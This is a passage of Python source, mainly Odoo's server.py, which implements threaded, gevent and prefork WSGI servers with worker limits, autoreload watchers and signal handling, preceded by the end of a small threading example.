logging.debug('waiting to synchronize')
ready.wait() # synchronize threads
logging.debug('wait over')
cursor.execute('select * from task')
logging.debug('SELECT EXECUTED')
cursor.fetchall()
logging.debug('results fetched')
if __name__ == '__main__':
ready = threading.Event()
threads = [
threading.Thread(name='Reader 1', target=reader),
threading.Thread(name='Reader 2', target=reader),
threading.Thread(name='Writer 1', target=writer),
threading.Thread(name='Writer 2', target=writer),
]
[t.start() for t in threads]
time.sleep(1)
logging.debug('setting ready')
ready.set()
[t.join() for t in threads]
|
server.py
|
#-----------------------------------------------------------
# Threaded, Gevent and Prefork Servers
#-----------------------------------------------------------
import datetime
import errno
import logging
import os
import os.path
import platform
import random
import select
import signal
import socket
import subprocess
import sys
import threading
import time
import unittest
import psutil
import werkzeug.serving
from werkzeug.debug import DebuggedApplication
if os.name == 'posix':
# Unix only for workers
import fcntl
import resource
try:
import inotify
from inotify.adapters import InotifyTrees
from inotify.constants import IN_MODIFY, IN_CREATE, IN_MOVED_TO
INOTIFY_LISTEN_EVENTS = IN_MODIFY | IN_CREATE | IN_MOVED_TO
except ImportError:
inotify = None
else:
# Windows shim
signal.SIGHUP = -1
inotify = None
if not inotify:
try:
import watchdog
from watchdog.observers import Observer
from watchdog.events import FileCreatedEvent, FileModifiedEvent, FileMovedEvent
except ImportError:
watchdog = None
# Optional process names for workers
try:
from setproctitle import setproctitle
except ImportError:
setproctitle = lambda x: None
import odoo
from odoo.modules import get_modules
from odoo.modules.module import run_unit_tests, get_test_modules
from odoo.modules.registry import Registry
from odoo.release import nt_service_name
from odoo.tools import config
from odoo.tools import stripped_sys_argv, dumpstacks, log_ormcache_stats
_logger = logging.getLogger(__name__)
SLEEP_INTERVAL = 60 # 1 min
def memory_info(process):
"""
:return: the relevant memory usage according to the OS in bytes.
"""
# psutil < 2.0 does not have memory_info, >= 3.0 does not have get_memory_info
pmem = (getattr(process, 'memory_info', None) or process.get_memory_info)()
# macOS allocates a very large vms to all processes, so we only monitor rss usage.
if platform.system() == 'Darwin':
return pmem.rss
return pmem.vms
def set_limit_memory_hard():
if os.name == 'posix' and config['limit_memory_hard']:
rlimit = resource.RLIMIT_RSS if platform.system() == 'Darwin' else resource.RLIMIT_AS
soft, hard = resource.getrlimit(rlimit)
resource.setrlimit(rlimit, (config['limit_memory_hard'], hard))
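# Drain a non-blocking pipe so select() stops reporting it as readable;
# EAGAIN just means the pipe is already empty.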
def empty_pipe(fd):
try:
while os.read(fd, 1):
pass
except OSError as e:
if e.errno not in [errno.EAGAIN]:
raise
#----------------------------------------------------------
# Werkzeug WSGI servers patched
#----------------------------------------------------------
class LoggingBaseWSGIServerMixIn(object):
def handle_error(self, request, client_address):
t, e, _ = sys.exc_info()
if t == socket.error and e.errno == errno.EPIPE:
# broken pipe, ignore error
return
_logger.exception('Exception happened during processing of request from %s', client_address)
class BaseWSGIServerNoBind(LoggingBaseWSGIServerMixIn, werkzeug.serving.BaseWSGIServer):
""" werkzeug Base WSGI Server patched to skip socket binding. PreforkServer
uses this class, sets the socket and calls process_request() manually
"""
def __init__(self, app):
werkzeug.serving.BaseWSGIServer.__init__(self, "127.0.0.1", 0, app)
# Directly close the socket. It will be replaced by WorkerHTTP when processing requests
if self.socket:
self.socket.close()
def server_activate(self):
# don't listen, as we use PreforkServer#socket
pass
class RequestHandler(werkzeug.serving.WSGIRequestHandler):
def setup(self):
# timeout to avoid chrome headless preconnect during tests
if config['test_enable'] or config['test_file']:
self.timeout = 5
# flag the current thread as handling a http request
super(RequestHandler, self).setup()
me = threading.currentThread()
me.name = 'odoo.service.http.request.%s' % (me.ident,)
class ThreadedWSGIServerReloadable(LoggingBaseWSGIServerMixIn, werkzeug.serving.ThreadedWSGIServer):
""" werkzeug Threaded WSGI Server patched to allow reusing a listen socket
given by the environment; this is used by autoreload to keep the listen
socket open when a reload happens.
"""
def __init__(self, host, port, app):
# The ODOO_MAX_HTTP_THREADS environment variable allows limiting the number of concurrent
# socket connections accepted by a threaded server, implicitly limiting the number of
# concurrent threads running to handle http requests.
self.max_http_threads = os.environ.get("ODOO_MAX_HTTP_THREADS")
if self.max_http_threads:
try:
self.max_http_threads = int(self.max_http_threads)
except ValueError:
# If the value can't be parsed as an integer, it defaults to half of db_maxconn:
# most requests won't borrow cursors concurrently, but some controllers
# might allocate two or more cursors.
self.max_http_threads = config['db_maxconn'] // 2
self.http_threads_sem = threading.Semaphore(self.max_http_threads)
super(ThreadedWSGIServerReloadable, self).__init__(host, port, app,
handler=RequestHandler)
# See https://github.com/pallets/werkzeug/pull/770
# This allows the request threads to not be set as daemon
# so the server waits for them when shutting down gracefully.
self.daemon_threads = False
def server_bind(self):
SD_LISTEN_FDS_START = 3
if os.environ.get('LISTEN_FDS') == '1' and os.environ.get('LISTEN_PID') == str(os.getpid()):
self.reload_socket = True
self.socket = socket.fromfd(SD_LISTEN_FDS_START, socket.AF_INET, socket.SOCK_STREAM)
_logger.info('HTTP service (werkzeug) running through socket activation')
else:
self.reload_socket = False
super(ThreadedWSGIServerReloadable, self).server_bind()
_logger.info('HTTP service (werkzeug) running on %s:%s', self.server_name, self.server_port)
def server_activate(self):
if not self.reload_socket:
super(ThreadedWSGIServerReloadable, self).server_activate()
def process_request(self, request, client_address):
"""
Start a new thread to process the request.
Override the default method of class socketserver.ThreadingMixIn
to be able to get the thread object which is instantiated
and set its start time as an attribute
"""
t = threading.Thread(target = self.process_request_thread,
args = (request, client_address))
t.daemon = self.daemon_threads
t.type = 'http'
t.start_time = time.time()
t.start()
# TODO: Remove this method as soon as either of the revision
# - python/cpython@8b1f52b5a93403acd7d112cd1c1bc716b31a418a for Python 3.6,
# - python/cpython@908082451382b8b3ba09ebba638db660edbf5d8e for Python 3.7,
# is included in all Python 3 releases installed on all operating systems supported by Odoo.
# These revisions are included in Python from releases 3.6.8 and Python 3.7.2 respectively.
def _handle_request_noblock(self):
"""
In the python module `socketserver` `process_request` loop,
the __shutdown_request flag is not checked between select and accept.
Thus when we set it to `True` thanks to the call `httpd.shutdown`,
a last request is accepted before exiting the loop.
We override this function to add an additional check before the accept().
"""
if self._BaseServer__shutdown_request:
return
if self.max_http_threads and not self.http_threads_sem.acquire(timeout=0.1):
# If the semaphore is full, return immediately to the caller (most probably
# socketserver.BaseServer's serve_forever loop, which will retry right away since the
# selector will still find a pending connection to accept on the socket). The 100 ms
# timeout avoids a CPU-bound loop while waiting for the semaphore.
return
# upstream _handle_request_noblock will handle errors and call shutdown_request in any cases
super(ThreadedWSGIServerReloadable, self)._handle_request_noblock()
def shutdown_request(self, request):
if self.max_http_threads:
# upstream is supposed to call this function no matter what happens during processing
self.http_threads_sem.release()
super().shutdown_request(request)
#----------------------------------------------------------
# FileSystem Watcher for autoreload and cache invalidation
#----------------------------------------------------------
class FSWatcherBase(object):
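# Only restart when a changed .py file at least byte-compiles, so a half-saved
# file does not take the server down; returns True when a restart was triggered.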
def handle_file(self, path):
if path.endswith('.py') and not os.path.basename(path).startswith('.~'):
try:
source = open(path, 'rb').read() + b'\n'
compile(source, path, 'exec')
except IOError:
_logger.error('autoreload: python code change detected, IOError for %s', path)
except SyntaxError:
_logger.error('autoreload: python code change detected, SyntaxError in %s', path)
else:
if not getattr(odoo, 'phoenix', False):
_logger.info('autoreload: python code updated, autoreload activated')
restart()
return True
class FSWatcherWatchdog(FSWatcherBase):
def __init__(self):
self.observer = Observer()
for path in odoo.addons.__path__:
_logger.info('Watching addons folder %s', path)
self.observer.schedule(self, path, recursive=True)
def dispatch(self, event):
if isinstance(event, (FileCreatedEvent, FileModifiedEvent, FileMovedEvent)):
if not event.is_directory:
path = getattr(event, 'dest_path', event.src_path)
self.handle_file(path)
def start(self):
self.observer.start()
_logger.info('AutoReload watcher running with watchdog')
def stop(self):
self.observer.stop()
self.observer.join()
class FSWatcherInotify(FSWatcherBase):
def __init__(self):
self.started = False
# ignore warnings from inotify in case we have duplicate addons paths.
inotify.adapters._LOGGER.setLevel(logging.ERROR)
# recreate a list as InotifyTrees' __init__ deletes the list's items
paths_to_watch = []
for path in odoo.addons.__path__:
paths_to_watch.append(path)
_logger.info('Watching addons folder %s', path)
self.watcher = InotifyTrees(paths_to_watch, mask=INOTIFY_LISTEN_EVENTS, block_duration_s=.5)
def run(self):
_logger.info('AutoReload watcher running with inotify')
dir_creation_events = set(('IN_MOVED_TO', 'IN_CREATE'))
while self.started:
for event in self.watcher.event_gen(timeout_s=0, yield_nones=False):
(_, type_names, path, filename) = event
if 'IN_ISDIR' not in type_names:
# despite not having IN_DELETE in the watcher's mask, the
# watcher sends these events when a directory is deleted.
if 'IN_DELETE' not in type_names:
full_path = os.path.join(path, filename)
if self.handle_file(full_path):
return
elif dir_creation_events.intersection(type_names):
full_path = os.path.join(path, filename)
for root, _, files in os.walk(full_path):
for file in files:
if self.handle_file(os.path.join(root, file)):
return
def start(self):
self.started = True
self.thread = threading.Thread(target=self.run, name="odoo.service.autoreload.watcher")
self.thread.setDaemon(True)
self.thread.start()
def stop(self):
self.started = False
self.thread.join()
#----------------------------------------------------------
# Servers: Threaded, Gevented and Prefork
#----------------------------------------------------------
class CommonServer(object):
def __init__(self, app):
self.app = app
# config
self.interface = config['http_interface'] or '0.0.0.0'
self.port = config['http_port']
# runtime
self.pid = os.getpid()
def close_socket(self, sock):
""" Closes a socket instance cleanly
:param sock: the network socket to close
:type sock: socket.socket
"""
try:
sock.shutdown(socket.SHUT_RDWR)
except socket.error as e:
if e.errno == errno.EBADF:
# Werkzeug > 0.9.6 closes the socket itself (see commit
# https://github.com/mitsuhiko/werkzeug/commit/4d8ca089)
return
# On OSX, socket shutdowns both sides if any side closes it
# causing an error 57 'Socket is not connected' on shutdown
# of the other side (or something), see
# http://bugs.python.org/issue4397
# note: stdlib fixed test, not behavior
if e.errno != errno.ENOTCONN or platform.system() not in ['Darwin', 'Windows']:
raise
sock.close()
class ThreadedServer(CommonServer):
def __init__(self, app):
super(ThreadedServer, self).__init__(app)
self.main_thread_id = threading.currentThread().ident
# Variable keeping track of the number of calls to the signal handler defined
# below. This variable is monitored by ``quit_on_signals()``.
self.quit_signals_received = 0
#self.socket = None
self.httpd = None
self.limits_reached_threads = set()
self.limit_reached_time = None
def signal_handler(self, sig, frame):
if sig in [signal.SIGINT, signal.SIGTERM]:
# shutdown on kill -INT or -TERM
self.quit_signals_received += 1
if self.quit_signals_received > 1:
# logging.shutdown was already called at this point.
sys.stderr.write("Forced shutdown.\n")
os._exit(0)
# interrupt run() to start shutdown
raise KeyboardInterrupt()
elif hasattr(signal, 'SIGXCPU') and sig == signal.SIGXCPU:
sys.stderr.write("CPU time limit exceeded! Shutting down immediately\n")
sys.stderr.flush()
os._exit(0)
elif sig == signal.SIGHUP:
# restart on kill -HUP
odoo.phoenix = True
self.quit_signals_received += 1
# interrupt run() to start shutdown
raise KeyboardInterrupt()
def process_limit(self):
memory = memory_info(psutil.Process(os.getpid()))
if config['limit_memory_soft'] and memory > config['limit_memory_soft']:
_logger.warning('Server memory limit (%s) reached.', memory)
self.limits_reached_threads.add(threading.currentThread())
for thread in threading.enumerate():
if not thread.daemon or getattr(thread, 'type', None) == 'cron':
# We apply the limits on cron threads and HTTP requests,
# longpolling requests excluded.
if getattr(thread, 'start_time', None):
thread_execution_time = time.time() - thread.start_time
thread_limit_time_real = config['limit_time_real']
if (getattr(thread, 'type', None) == 'cron' and
config['limit_time_real_cron'] and config['limit_time_real_cron'] > 0):
thread_limit_time_real = config['limit_time_real_cron']
if thread_limit_time_real and thread_execution_time > thread_limit_time_real:
_logger.warning(
'Thread %s virtual real time limit (%d/%ds) reached.',
thread, thread_execution_time, thread_limit_time_real)
self.limits_reached_threads.add(thread)
# Clean-up threads that are no longer alive
# e.g. threads that exceeded their real time,
# but which finished before the server could restart.
for thread in list(self.limits_reached_threads):
if not thread.isAlive():
self.limits_reached_threads.remove(thread)
if self.limits_reached_threads:
self.limit_reached_time = self.limit_reached_time or time.time()
else:
self.limit_reached_time = None
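# Each cron thread wakes up roughly once per SLEEP_INTERVAL (offset by its number)
# and tries to acquire pending jobs on every database whose registry is ready.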
def cron_thread(self, number):
from odoo.addons.base.models.ir_cron import ir_cron
while True:
time.sleep(SLEEP_INTERVAL + number) # Steve Reich timing style
registries = odoo.modules.registry.Registry.registries
_logger.debug('cron%d polling for jobs', number)
for db_name, registry in registries.items():
if registry.ready:
thread = threading.currentThread()
thread.start_time = time.time()
try:
ir_cron._acquire_job(db_name)
except Exception:
_logger.warning('cron%d encountered an Exception:', number, exc_info=True)
thread.start_time = None
def cron_spawn(self):
""" Start the above runner function in a daemon thread.
The thread is a typical daemon thread: it will never quit and must be
terminated when the main process exits - with no consequence (the processing
threads it spawns are not marked daemon).
"""
# Force call to strptime just before starting the cron thread
# to prevent time.strptime AttributeError within the thread.
# See: http://bugs.python.org/issue7980
datetime.datetime.strptime('2012-01-01', '%Y-%m-%d')
for i in range(odoo.tools.config['max_cron_threads']):
def target():
self.cron_thread(i)
t = threading.Thread(target=target, name="odoo.service.cron.cron%d" % i)
t.setDaemon(True)
t.type = 'cron'
t.start()
_logger.debug("cron%d started!" % i)
def http_thread(self):
def app(e, s):
return self.app(e, s)
self.httpd = ThreadedWSGIServerReloadable(self.interface, self.port, app)
self.httpd.serve_forever()
def http_spawn(self):
t = threading.Thread(target=self.http_thread, name="odoo.service.httpd")
t.setDaemon(True)
t.start()
def start(self, stop=False):
_logger.debug("Setting signal handlers")
set_limit_memory_hard()
if os.name == 'posix':
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGTERM, self.signal_handler)
signal.signal(signal.SIGCHLD, self.signal_handler)
signal.signal(signal.SIGHUP, self.signal_handler)
signal.signal(signal.SIGXCPU, self.signal_handler)
signal.signal(signal.SIGQUIT, dumpstacks)
signal.signal(signal.SIGUSR1, log_ormcache_stats)
elif os.name == 'nt':
import win32api
win32api.SetConsoleCtrlHandler(lambda sig: self.signal_handler(sig, None), 1)
test_mode = config['test_enable'] or config['test_file']
if test_mode or (config['http_enable'] and not stop):
# some tests need the http daemon to be available...
self.http_spawn()
def stop(self):
""" Shutdown the WSGI server. Wait for non deamon threads.
"""
if getattr(odoo, 'phoenix', None):
_logger.info("Initiating server reload")
else:
_logger.info("Initiating shutdown")
_logger.info("Hit CTRL-C again or send a second signal to force the shutdown.")
stop_time = time.time()
if self.httpd:
self.httpd.shutdown()
# Manually join() all threads before calling sys.exit() to allow a second signal
# to trigger _force_quit() in case some non-daemon threads won't exit cleanly.
# threading.Thread.join() should not mask signals (at least in python 2.5).
me = threading.currentThread()
_logger.debug('current thread: %r', me)
for thread in threading.enumerate():
_logger.debug('process %r (%r)', thread, thread.isDaemon())
if (thread != me and not thread.isDaemon() and thread.ident != self.main_thread_id and
thread not in self.limits_reached_threads):
while thread.isAlive() and (time.time() - stop_time) < 1:
# We wait for requests to finish, up to 1 second.
_logger.debug('join and sleep')
# Need a busyloop here as thread.join() masks signals
# and would prevent the forced shutdown.
thread.join(0.05)
time.sleep(0.05)
_logger.debug('--')
logging.shutdown()
def run(self, preload=None, stop=False):
""" Start the http server and the cron thread then wait for a signal.
The first SIGINT or SIGTERM signal will initiate a graceful shutdown while
a second one if any will force an immediate exit.
"""
self.start(stop=stop)
rc = preload_registries(preload)
if stop:
self.stop()
return rc
self.cron_spawn()
# Wait for a first signal to be handled. (time.sleep will be interrupted
# by the signal handler)
try:
while self.quit_signals_received == 0:
self.process_limit()
if self.limit_reached_time:
has_other_valid_requests = any(
not t.daemon and
t not in self.limits_reached_threads
for t in threading.enumerate()
if getattr(t, 'type', None) == 'http')
if (not has_other_valid_requests or
(time.time() - self.limit_reached_time) > SLEEP_INTERVAL):
# We wait until there are no requests being processed
# other than the ones exceeding the limits, for up to 1 min,
# before asking for a reload.
_logger.info('Dumping stacktrace of limit exceeding threads before reloading')
dumpstacks(thread_idents=[thread.ident for thread in self.limits_reached_threads])
self.reload()
# `reload` increments `self.quit_signals_received`
# and the loop will end after this iteration,
# therefore leading to the server stop.
# `reload` also sets the `phoenix` flag
# to tell the server to restart the server after shutting down.
else:
time.sleep(1)
else:
time.sleep(SLEEP_INTERVAL)
except KeyboardInterrupt:
pass
self.stop()
def reload(self):
os.kill(self.pid, signal.SIGHUP)
class GeventServer(CommonServer):
def __init__(self, app):
super(GeventServer, self).__init__(app)
self.port = config['longpolling_port']
self.httpd = None
def process_limits(self):
restart = False
if self.ppid != os.getppid():
_logger.warning("LongPolling Parent changed", self.pid)
restart = True
memory = memory_info(psutil.Process(self.pid))
if config['limit_memory_soft'] and memory > config['limit_memory_soft']:
_logger.warning('LongPolling virtual memory limit reached: %s', memory)
restart = True
if restart:
# suicide !!
os.kill(self.pid, signal.SIGTERM)
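# Gevent watchdog: every `beat` seconds re-check the memory limit and whether
# the parent process changed, and ask this process to terminate if so.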
def watchdog(self, beat=4):
import gevent
self.ppid = os.getppid()
while True:
self.process_limits()
gevent.sleep(beat)
def start(self):
import gevent
try:
from gevent.pywsgi import WSGIServer, WSGIHandler
except ImportError:
from gevent.wsgi import WSGIServer, WSGIHandler
class ProxyHandler(WSGIHandler):
""" When logging requests, try to get the client address from
the environment so we get proxyfix's modifications (if any).
Derived from werkzeug.serving.WSGIRequestHandler.log
/ werkzeug.serving.WSGIRequestHandler.address_string
"""
def format_request(self):
old_address = self.client_address
if getattr(self, 'environ', None):
self.client_address = self.environ['REMOTE_ADDR']
elif not self.client_address:
self.client_address = '<local>'
# other cases are handled inside WSGIHandler
try:
return super().format_request()
finally:
self.client_address = old_address
set_limit_memory_hard()
if os.name == 'posix':
# Set process memory limit as an extra safeguard
signal.signal(signal.SIGQUIT, dumpstacks)
signal.signal(signal.SIGUSR1, log_ormcache_stats)
gevent.spawn(self.watchdog)
self.httpd = WSGIServer(
(self.interface, self.port), self.app,
log=logging.getLogger('longpolling'),
error_log=logging.getLogger('longpolling'),
handler_class=ProxyHandler,
)
_logger.info('Evented Service (longpolling) running on %s:%s', self.interface, self.port)
try:
self.httpd.serve_forever()
except:
_logger.exception("Evented Service (longpolling): uncaught error during main loop")
raise
def stop(self):
import gevent
self.httpd.stop()
gevent.shutdown()
def run(self, preload, stop):
self.start()
self.stop()
class PreforkServer(CommonServer):
""" Multiprocessing inspired by (g)unicorn.
PreforkServer (aka Multicorn) currently uses accept(2) as dispatching
method between workers, but we plan to replace it with a more intelligent
dispatcher that will parse the first HTTP request line.
"""
def __init__(self, app):
# config
self.address = config['http_enable'] and \
(config['http_interface'] or '0.0.0.0', config['http_port'])
self.population = config['workers']
self.timeout = config['limit_time_real']
self.limit_request = config['limit_request']
self.cron_timeout = config['limit_time_real_cron'] or None
if self.cron_timeout == -1:
self.cron_timeout = self.timeout
# working vars
self.beat = 4
self.app = app
self.pid = os.getpid()
self.socket = None
self.workers_http = {}
self.workers_cron = {}
self.workers = {}
self.generation = 0
self.queue = []
self.long_polling_pid = None
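# Create a pipe with both ends non-blocking and close-on-exec; used for the
# self-pipe wake-up trick and for the per-worker watchdog pipes.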
def pipe_new(self):
pipe = os.pipe()
for fd in pipe:
# non_blocking
flags = fcntl.fcntl(fd, fcntl.F_GETFL) | os.O_NONBLOCK
fcntl.fcntl(fd, fcntl.F_SETFL, flags)
# close_on_exec
flags = fcntl.fcntl(fd, fcntl.F_GETFD) | fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
return pipe
def pipe_ping(self, pipe):
try:
os.write(pipe[1], b'.')
except IOError as e:
if e.errno not in [errno.EAGAIN, errno.EINTR]:
raise
def signal_handler(self, sig, frame):
if len(self.queue) < 5 or sig == signal.SIGCHLD:
self.queue.append(sig)
self.pipe_ping(self.pipe)
else:
_logger.warn("Dropping signal: %s", sig)
def worker_spawn(self, klass, workers_registry):
self.generation += 1
worker = klass(self)
pid = os.fork()
if pid != 0:
worker.pid = pid
self.workers[pid] = worker
workers_registry[pid] = worker
return worker
else:
worker.run()
sys.exit(0)
def long_polling_spawn(self):
nargs = stripped_sys_argv()
cmd = [sys.executable, sys.argv[0], 'gevent'] + nargs[1:]
popen = subprocess.Popen(cmd)
self.long_polling_pid = popen.pid
def worker_pop(self, pid):
if pid == self.long_polling_pid:
self.long_polling_pid = None
if pid in self.workers:
_logger.debug("Worker (%s) unregistered", pid)
try:
self.workers_http.pop(pid, None)
self.workers_cron.pop(pid, None)
u = self.workers.pop(pid)
u.close()
except OSError:
return
def worker_kill(self, pid, sig):
try:
os.kill(pid, sig)
except OSError as e:
if e.errno == errno.ESRCH:
self.worker_pop(pid)
def process_signals(self):
while len(self.queue):
sig = self.queue.pop(0)
if sig in [signal.SIGINT, signal.SIGTERM]:
raise KeyboardInterrupt
elif sig == signal.SIGHUP:
# restart on kill -HUP
odoo.phoenix = True
raise KeyboardInterrupt
elif sig == signal.SIGQUIT:
# dump stacks on kill -3
dumpstacks()
elif sig == signal.SIGUSR1:
# log ormcache stats on kill -SIGUSR1
log_ormcache_stats()
elif sig == signal.SIGTTIN:
# increase number of workers
self.population += 1
elif sig == signal.SIGTTOU:
# decrease number of workers
self.population -= 1
def process_zombie(self):
# reap dead workers
while 1:
try:
wpid, status = os.waitpid(-1, os.WNOHANG)
if not wpid:
break
if (status >> 8) == 3:
msg = "Critial worker error (%s)"
_logger.critical(msg, wpid)
raise Exception(msg % wpid)
self.worker_pop(wpid)
except OSError as e:
if e.errno == errno.ECHILD:
break
raise
def process_timeout(self):
now = time.time()
for (pid, worker) in self.workers.items():
if worker.watchdog_timeout is not None and \
(now - worker.watchdog_time) >= worker.watchdog_timeout:
_logger.error("%s (%s) timeout after %ss",
worker.__class__.__name__,
pid,
worker.watchdog_timeout)
self.worker_kill(pid, signal.SIGKILL)
def process_spawn(self):
if config['http_enable']:
while len(self.workers_http) < self.population:
self.worker_spawn(WorkerHTTP, self.workers_http)
if not self.long_polling_pid:
self.long_polling_spawn()
while len(self.workers_cron) < config['max_cron_threads']:
self.worker_spawn(WorkerCron, self.workers_cron)
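# Wait up to `beat` seconds for either a worker watchdog ping or an internal
# wake-up, refreshing the watchdog timestamp of every worker that pinged.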
def sleep(self):
try:
# map of fd -> worker
fds = {w.watchdog_pipe[0]: w for w in self.workers.values()}
fd_in = list(fds) + [self.pipe[0]]
# check for ping or internal wakeups
ready = select.select(fd_in, [], [], self.beat)
# update worker watchdogs
for fd in ready[0]:
if fd in fds:
fds[fd].watchdog_time = time.time()
empty_pipe(fd)
except select.error as e:
if e.args[0] not in [errno.EINTR]:
raise
def start(self):
# Wake-up pipe: Python doesn't raise EINTR when a syscall is interrupted
# by a signal, simulating a pseudo SA_RESTART. We write to a pipe in the
# signal handler to overcome this behaviour.
self.pipe = self.pipe_new()
# set signal handlers
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGTERM, self.signal_handler)
signal.signal(signal.SIGHUP, self.signal_handler)
signal.signal(signal.SIGCHLD, self.signal_handler)
signal.signal(signal.SIGTTIN, self.signal_handler)
signal.signal(signal.SIGTTOU, self.signal_handler)
signal.signal(signal.SIGQUIT, dumpstacks)
signal.signal(signal.SIGUSR1, log_ormcache_stats)
if self.address:
# listen to socket
_logger.info('HTTP service (werkzeug) running on %s:%s', *self.address)
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.setblocking(0)
self.socket.bind(self.address)
self.socket.listen(8 * self.population)
def stop(self, graceful=True):
if self.long_polling_pid is not None:
# FIXME make longpolling process handle SIGTERM correctly
self.worker_kill(self.long_polling_pid, signal.SIGKILL)
self.long_polling_pid = None
if graceful:
_logger.info("Stopping gracefully")
limit = time.time() + self.timeout
for pid in self.workers:
self.worker_kill(pid, signal.SIGINT)
while self.workers and time.time() < limit:
try:
self.process_signals()
except KeyboardInterrupt:
_logger.info("Forced shutdown.")
break
self.process_zombie()
time.sleep(0.1)
else:
_logger.info("Stopping forcefully")
            for pid in list(self.workers):
self.worker_kill(pid, signal.SIGTERM)
if self.socket:
self.socket.close()
def run(self, preload, stop):
self.start()
rc = preload_registries(preload)
if stop:
self.stop()
return rc
        # Empty the cursor pool, we don't want cursors to be shared among forked workers.
odoo.sql_db.close_all()
_logger.debug("Multiprocess starting")
while 1:
try:
#_logger.debug("Multiprocess beat (%s)",time.time())
self.process_signals()
self.process_zombie()
self.process_timeout()
self.process_spawn()
self.sleep()
except KeyboardInterrupt:
_logger.debug("Multiprocess clean stop")
self.stop()
break
except Exception as e:
_logger.exception(e)
self.stop(False)
return -1
class Worker(object):
""" Workers """
def __init__(self, multi):
self.multi = multi
self.watchdog_time = time.time()
self.watchdog_pipe = multi.pipe_new()
self.eintr_pipe = multi.pipe_new()
self.wakeup_fd_r, self.wakeup_fd_w = self.eintr_pipe
# Can be set to None if no watchdog is desired.
self.watchdog_timeout = multi.timeout
self.ppid = os.getpid()
self.pid = None
self.alive = True
# should we rename into lifetime ?
self.request_max = multi.limit_request
self.request_count = 0
def setproctitle(self, title=""):
setproctitle('odoo: %s %s %s' % (self.__class__.__name__, self.pid, title))
def close(self):
os.close(self.watchdog_pipe[0])
os.close(self.watchdog_pipe[1])
os.close(self.eintr_pipe[0])
os.close(self.eintr_pipe[1])
def signal_handler(self, sig, frame):
self.alive = False
def signal_time_expired_handler(self, n, stack):
# TODO: print actual RUSAGE_SELF (since last check_limits) instead of
# just repeating the config setting
_logger.info('Worker (%d) CPU time limit (%s) reached.', self.pid, config['limit_time_cpu'])
        # We don't commit suicide in this case
raise Exception('CPU time limit exceeded.')
def sleep(self):
try:
select.select([self.multi.socket, self.wakeup_fd_r], [], [], self.multi.beat)
# clear wakeup pipe if we were interrupted
empty_pipe(self.wakeup_fd_r)
except select.error as e:
if e.args[0] not in [errno.EINTR]:
raise
def check_limits(self):
        # If our parent changed, commit suicide
if self.ppid != os.getppid():
_logger.info("Worker (%s) Parent changed", self.pid)
self.alive = False
# check for lifetime
if self.request_count >= self.request_max:
_logger.info("Worker (%d) max request (%s) reached.", self.pid, self.request_count)
self.alive = False
# Reset the worker if it consumes too much memory (e.g. caused by a memory leak).
memory = memory_info(psutil.Process(os.getpid()))
if config['limit_memory_soft'] and memory > config['limit_memory_soft']:
_logger.info('Worker (%d) virtual memory limit (%s) reached.', self.pid, memory)
self.alive = False # Commit suicide after the request.
set_limit_memory_hard()
# update RLIMIT_CPU so limit_time_cpu applies per unit of work
r = resource.getrusage(resource.RUSAGE_SELF)
cpu_time = r.ru_utime + r.ru_stime
soft, hard = resource.getrlimit(resource.RLIMIT_CPU)
resource.setrlimit(resource.RLIMIT_CPU, (cpu_time + config['limit_time_cpu'], hard))
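        # Worked example (illustrative numbers): with limit_time_cpu = 60 and
        # 12s of CPU already consumed, the soft limit becomes 72s, so the next
        # unit of work gets a fresh 60s CPU budget before SIGXCPU fires and
        # signal_time_expired_handler() aborts the request.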
def process_work(self):
pass
def start(self):
self.pid = os.getpid()
self.setproctitle()
_logger.info("Worker %s (%s) alive", self.__class__.__name__, self.pid)
# Reseed the random number generator
random.seed()
if self.multi.socket:
# Prevent fd inheritance: close_on_exec
flags = fcntl.fcntl(self.multi.socket, fcntl.F_GETFD) | fcntl.FD_CLOEXEC
fcntl.fcntl(self.multi.socket, fcntl.F_SETFD, flags)
# reset blocking status
self.multi.socket.setblocking(0)
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGXCPU, self.signal_time_expired_handler)
signal.signal(signal.SIGTERM, signal.SIG_DFL)
signal.signal(signal.SIGHUP, signal.SIG_DFL)
signal.signal(signal.SIGCHLD, signal.SIG_DFL)
signal.signal(signal.SIGTTIN, signal.SIG_DFL)
signal.signal(signal.SIGTTOU, signal.SIG_DFL)
signal.set_wakeup_fd(self.wakeup_fd_w)
def stop(self):
pass
def run(self):
try:
self.start()
t = threading.Thread(name="Worker %s (%s) workthread" % (self.__class__.__name__, self.pid), target=self._runloop)
t.daemon = True
t.start()
t.join()
_logger.info("Worker (%s) exiting. request_count: %s, registry count: %s.",
self.pid, self.request_count,
len(odoo.modules.registry.Registry.registries))
self.stop()
except Exception:
_logger.exception("Worker (%s) Exception occured, exiting..." % self.pid)
# should we use 3 to abort everything ?
sys.exit(1)
def _runloop(self):
signal.pthread_sigmask(signal.SIG_BLOCK, {
signal.SIGXCPU,
signal.SIGINT, signal.SIGQUIT, signal.SIGUSR1,
})
try:
while self.alive:
self.check_limits()
self.multi.pipe_ping(self.watchdog_pipe)
self.sleep()
if not self.alive:
break
self.process_work()
except:
_logger.exception("Worker %s (%s) Exception occured, exiting...", self.__class__.__name__, self.pid)
sys.exit(1)
class WorkerHTTP(Worker):
""" HTTP Request workers """
def __init__(self, multi):
super(WorkerHTTP, self).__init__(multi)
# The ODOO_HTTP_SOCKET_TIMEOUT environment variable allows to control socket timeout for
# extreme latency situations. It's generally better to use a good buffering reverse proxy
        # to quickly free workers rather than increasing this timeout to accommodate high network
# latencies & b/w saturation. This timeout is also essential to protect against accidental
# DoS due to idle HTTP connections.
sock_timeout = os.environ.get("ODOO_HTTP_SOCKET_TIMEOUT")
self.sock_timeout = float(sock_timeout) if sock_timeout else 2
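        # For example (hypothetical invocation), a deployment behind a very slow
        # link might raise the per-socket timeout from the 2s default with:
        #   ODOO_HTTP_SOCKET_TIMEOUT=10 odoo-bin --workers=4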
def process_request(self, client, addr):
client.setblocking(1)
client.settimeout(self.sock_timeout)
client.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
        # Prevent fd inheritance: close_on_exec
flags = fcntl.fcntl(client, fcntl.F_GETFD) | fcntl.FD_CLOEXEC
fcntl.fcntl(client, fcntl.F_SETFD, flags)
# do request using BaseWSGIServerNoBind monkey patched with socket
self.server.socket = client
# tolerate broken pipe when the http client closes the socket before
